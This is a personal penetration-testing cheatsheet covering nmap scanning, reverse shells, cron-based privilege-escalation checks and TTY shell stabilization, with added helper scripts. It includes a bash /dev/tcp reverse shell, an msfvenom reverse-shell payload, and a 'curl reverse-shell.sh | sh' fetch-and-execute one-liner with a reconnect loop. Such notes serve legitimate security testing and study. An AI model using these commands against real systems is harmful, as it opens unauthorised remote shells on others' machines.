pentesting/Cheatsheet.md
2025-06-15 12:31:18 +02:00

#### to install:
- magic wormhole
- tldr (the package is called `tealdeer`; it provides the `tldr` command)
- rlwrap
```bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
```
#### for keyring
-> if apt on Kali fails with a keyring / signature error, fetch the current archive keyring:
```bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
```
# information gathering
### nmap
ping sweep of a subnet to find live hosts (`-sn`: host discovery only, no port scan):
```bash
nmap -sn ip/24
```
to filter the output down to the live IPs:
```bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
```
(`$5` is the address only when nmap prints no hostname; for a line like `Nmap scan report for host (192.168.1.20)` it returns the hostname instead.)
scan open ports: first a fast full-range scan (`-p-`), then scripts and version detection (`-sCV -A`) only against the ports found open:
```bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
```
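The two one-liners above are fragile: `awk '{print $5}'` returns the hostname when nmap resolves a name, and the grep/tr/sed chain for the port list is easy to get wrong. The following is an added example, not part of the original cheatsheet: two small parsers for `nmap -sn` and `nmap -p-` output. The nmap output embedded in the block is constructed for the demo, and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet: robust parsing of nmap
# output for the two one-liners above. `awk '{print $5}'` returns the hostname
# instead of the address when nmap resolves a name ("Nmap scan report for
# router.lan (192.168.1.254)"). Sample output below is constructed for the demo.

# live_ips: read `nmap -sn` output on stdin, print one IP per line.
live_ips() {
    awk '/^Nmap scan report for / {
        ip = $NF               # last field is "1.2.3.4" or "(1.2.3.4)"
        gsub(/[()]/, "", ip)   # strip the parentheses of the hostname form
        print ip
    }'
}

# open_ports: read `nmap -p-` output on stdin, print "22,80,8080" for -p.
# Matches "open" and "open|filtered" states; ignores closed/filtered lines.
open_ports() {
    awk -F'/' '/^[0-9]+\/tcp +open/ { printf "%s%s", sep, $1; sep = "," }
               END { print "" }'
}

# Constructed sample output (shape of what nmap 7.x prints, shortened).
SAMPLE_PING_SWEEP='Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
Nmap scan report for router.lan (192.168.1.254)
Host is up (0.0021s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.51 seconds'

SAMPLE_PORT_SCAN='Nmap scan report for 192.168.1.155
Host is up (0.00052s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy'

printf '%s\n' "$SAMPLE_PING_SWEEP" | live_ips        # 192.168.1.1 and 192.168.1.254
printf '%s\n' "$SAMPLE_PORT_SCAN"  | open_ports      # 22,80,8080

# Real use (replace the samples with live nmap runs):
#   nmap -sn 192.168.1.0/24 | live_ips > ips.txt
#   target=192.168.1.155
#   nmap -sCV -p "$(nmap -p- "$target" | open_ports)" "$target"
```

Both functions read from stdin, so they drop into the existing pipelines unchanged; `open_ports` also emits no trailing comma, so the `sed 's/.$//'` step is no longer needed.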
#### for Windows
run the `vuln` script category (`--vuln` on its own is not an nmap option):
```bash
nmap --script vuln ip
```
##### for Windows + SMB
the scripts are named `smb-vuln-*` (e.g. `smb-vuln-ms17-010`), so this is the pattern to use; `vuln-smb*` matches nothing:
```bash
nmap --script smb-vuln* ip
```
# initial access
### start listener:
```bash
rlwrap -cAr nc -nlvp 9002
```
### reverse shell bash:
```bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
```
### reverse shell file:
```bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
```
-> from revshells.com
### untested:
Reverse Shell as a Service (reverse-shell.sh)
1. On your machine:
```bash
nc -nlvp 1337
```
(`nc -l 1337` only works with the OpenBSD netcat; `-nlvp` is accepted by both the OpenBSD and the traditional variant.)
2. On the target machine:
```bash
curl https://reverse-shell.sh/yourip:1337 | sh
```
this fetches a script from a third-party server and pipes it straight into `sh` on the target, so the target's IP is also disclosed to that server; fine for a lab, not for a client system.
#### reconnecting:
```bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; sleep 5; done
```
# privilege escalation
### always run these:
```bash
sudo -l
```
if sudo complains that a terminal is required, spawn a TTY first:
[[#^78d3ce|spawn shell]]
#### check cronjobs
```bash
ls -la /etc/cron*
crontab -l
```
(also look at who owns the referenced scripts and whether you can write to them)
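Listing the cron jobs is only half the check; what matters for escalation is whether any script that root's cron runs is writable by a low-privileged user. The following is an added example, not part of the original cheatsheet: two helpers that flag world-writable files under the cron directories and world-writable paths referenced from crontab lines. The demo directory, the two fake scripts and the crontab lines are constructed for the example; the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet. Flags (a) world-writable
# files under the cron directories and (b) world-writable paths referenced from
# crontab lines. The demo directory and crontab lines below are constructed;
# mode bits are tested instead of `test -w` so the result does not depend on
# who runs the script.

# writable_cron_files DIR...: world-writable regular files below DIR, sorted.
writable_cron_files() {
    find "$@" -type f -perm -0002 2>/dev/null | sort
}

# writable_cron_targets: read crontab lines on stdin (user or system format),
# print every absolute path in them that is a world-writable regular file.
writable_cron_targets() {
    awk '!/^[ \t]*#/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }' \
    | sort -u | while read -r path; do
        # -H follows a symlink given on the command line, so /bin/sh -> dash is
        # judged by dash's mode bits, not by the 0777 of the link itself
        if find -H "$path" -maxdepth 0 -type f -perm -0002 2>/dev/null | grep -q .; then
            printf '%s\n' "$path"
        fi
    done
}

# --- constructed demo: two "cron scripts", one of them world-writable ---
DEMO_DIR=$(mktemp -d)
printf '#!/bin/sh\necho backup\n'  > "$DEMO_DIR/backup.sh";  chmod 0755 "$DEMO_DIR/backup.sh"
printf '#!/bin/sh\necho cleanup\n' > "$DEMO_DIR/cleanup.sh"; chmod 0777 "$DEMO_DIR/cleanup.sh"

# /etc/crontab format: m h dom mon dow user command
SAMPLE_CRONTAB="# m h dom mon dow user command
*/5 * * * * root $DEMO_DIR/backup.sh
0 3 * * *   root /bin/sh $DEMO_DIR/cleanup.sh --force"

echo "world-writable files under $DEMO_DIR:"
writable_cron_files "$DEMO_DIR"                          # .../cleanup.sh
echo "writable targets referenced by the crontab:"
printf '%s\n' "$SAMPLE_CRONTAB" | writable_cron_targets  # .../cleanup.sh

# Real use on a target:
#   writable_cron_files /etc/cron.d /etc/cron.daily /etc/cron.hourly /var/spool/cron
#   cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_cron_targets
```

A hit from either function is a script you can edit that root will execute on schedule; a world-writable directory on the path to the script (swap the file) is the same class of finding and worth checking by hand.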
## TTY Spawn Shell
##### if sudo still doesn't work
`sudo -S` reads the password from stdin instead of the terminal, which gets around "a terminal is required to read the password":
```bash
sudo -S command
```
Often during pen tests you obtain a shell without a TTY but want to interact further with the system. The commands below spawn a TTY shell; which ones work depends on the system environment and the installed packages.
### Python spawn shell
```bash
python -c 'import pty; pty.spawn("/bin/bash")'
```
#### Fully interactive TTY: all the steps to stabilize your shell
**The first step:**
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
This uses Python to spawn bash inside a pseudo-terminal. The shell already looks a bit prettier, but tab completion and the arrow keys still do not work.
**Step two is:**
```bash
export TERM=xterm
```
This gives us terminal-aware commands such as `clear` and lets programs like `vim` and `less` draw correctly.
**Finally (and most importantly) we background the shell with**
```bash
Ctrl + Z
```
Back in our own terminal we run
```bash
stty raw -echo; fg
```
This does two things: first, it puts our own terminal into raw mode and turns off local echo, which is what gives us tab completion, the arrow keys and Ctrl + C inside the remote shell; second, `fg` brings the reverse shell back to the foreground. Then set the size of the remote terminal to match your own (take the numbers from `stty size` in a second local terminal):
```bash
stty rows 38 columns 116
```
If the reverse shell dies while your terminal is in raw mode, type `reset` blind to get a usable local terminal back.
### Python os.system spawn shell
```bash
python -c 'import os; os.system("/bin/bash")'
```
### sh spawn shell
```bash
/bin/sh -i
```
### Perl spawn shell
```bash
perl -e 'exec "/bin/sh";'
```
### Ruby spawn shell
```bash
ruby -e 'exec "/bin/sh"'
```
### Lua spawn shell
```bash
lua -e 'os.execute("/bin/sh")'
```
### IRB spawn shell
inside an `irb` session:
```ruby
exec "/bin/sh"
```
### VI spawn shell
```vim
:!bash
```
### VI(2) spawn shell
set the shell option, then drop into it:
```vim
:set shell=/bin/bash
:shell
```
### Nmap spawn shell
only with old nmap builds that still have `--interactive` (removed from current releases):
```bash
nmap --interactive
!sh
```
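Rather than trying the spawn commands above one by one, it is quicker to probe the target for a PTY-capable interpreter and to compute the `stty rows/columns` line from your own terminal. The following is an added example, not part of the original cheatsheet, covering both the stabilization steps and the spawn-shell list: `pty_spawn_cmd` looks for `python3`, `python` or util-linux `script` (that candidate list is my assumption; extend it with whatever the target has) and prints the matching spawn command, and `target_stty_cmd` prints the `stty` line for the remote shell. The fake PATH directories at the bottom are constructed for the sanity check.

```shell
#!/bin/sh
# Added example, not part of the original cheatsheet. pty_spawn_cmd probes a
# PATH-like list for a PTY-capable interpreter (python3, python, or util-linux
# `script`; the candidate list is an assumption) and prints the spawn command;
# target_stty_cmd prints the stty line for the target from your own terminal's
# `stty size`. The fake directories at the bottom are constructed.

# have_in NAME PATHLIST: is NAME an executable file in one of the ':'-separated dirs?
have_in() (
    name=$1
    set -f; IFS=:                         # split on ':' only, no globbing
    for dir in $2; do
        [ -f "$dir/$name" ] && [ -x "$dir/$name" ] && return 0
    done
    return 1
)

# pty_spawn_cmd [PATHLIST]: print the first usable PTY spawn command.
# Defaults to the current $PATH; returns 1 if nothing suitable is found.
pty_spawn_cmd() {
    search=${1:-$PATH}
    for cand in python3 python script; do
        if have_in "$cand" "$search"; then
            case $cand in
                python3|python) printf "%s -c 'import pty; pty.spawn(\"/bin/bash\")'\n" "$cand" ;;
                script)         printf 'script -qc /bin/bash /dev/null\n' ;;
            esac
            return 0
        fi
    done
    echo "no python3/python/script found; fall back to the manual tricks above" >&2
    return 1
}

# target_stty_cmd ["ROWS COLS"]: the stty line to paste into the target shell.
# Without an argument it reads your own terminal via `stty size` (24x80 if no TTY).
target_stty_cmd() {
    size=${1:-$(stty size 2>/dev/null || echo "24 80")}
    set -- $size
    printf 'stty rows %s columns %s\n' "$1" "$2"
}

# Typical flow on the attacker box after the shell connects:
#   pty_spawn_cmd          -> paste its output into the target shell
#   export TERM=xterm      -> in the target shell
#   Ctrl+Z; stty raw -echo; fg
#   target_stty_cmd        -> paste its output into the target shell
pty_spawn_cmd || true
target_stty_cmd

# Sanity check against constructed fake PATHs: a dir with only `script`, and an empty dir.
FAKE_BIN=$(mktemp -d); : > "$FAKE_BIN/script"; chmod 0755 "$FAKE_BIN/script"
pty_spawn_cmd "$FAKE_BIN"                # script -qc /bin/bash /dev/null
EMPTY_BIN=$(mktemp -d)
pty_spawn_cmd "$EMPTY_BIN" || echo "(no interpreter in $EMPTY_BIN, as expected)"
```

Run `pty_spawn_cmd` in the dumb shell you landed in (or copy the function over); `target_stty_cmd` is meant for your own terminal, since that is the size the remote side has to match.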
#### exiftool
read metadata:
```bash
exiftool picture.png
```
Binwalk (extract embedded binary data):
```bash
binwalk -e picture.png
```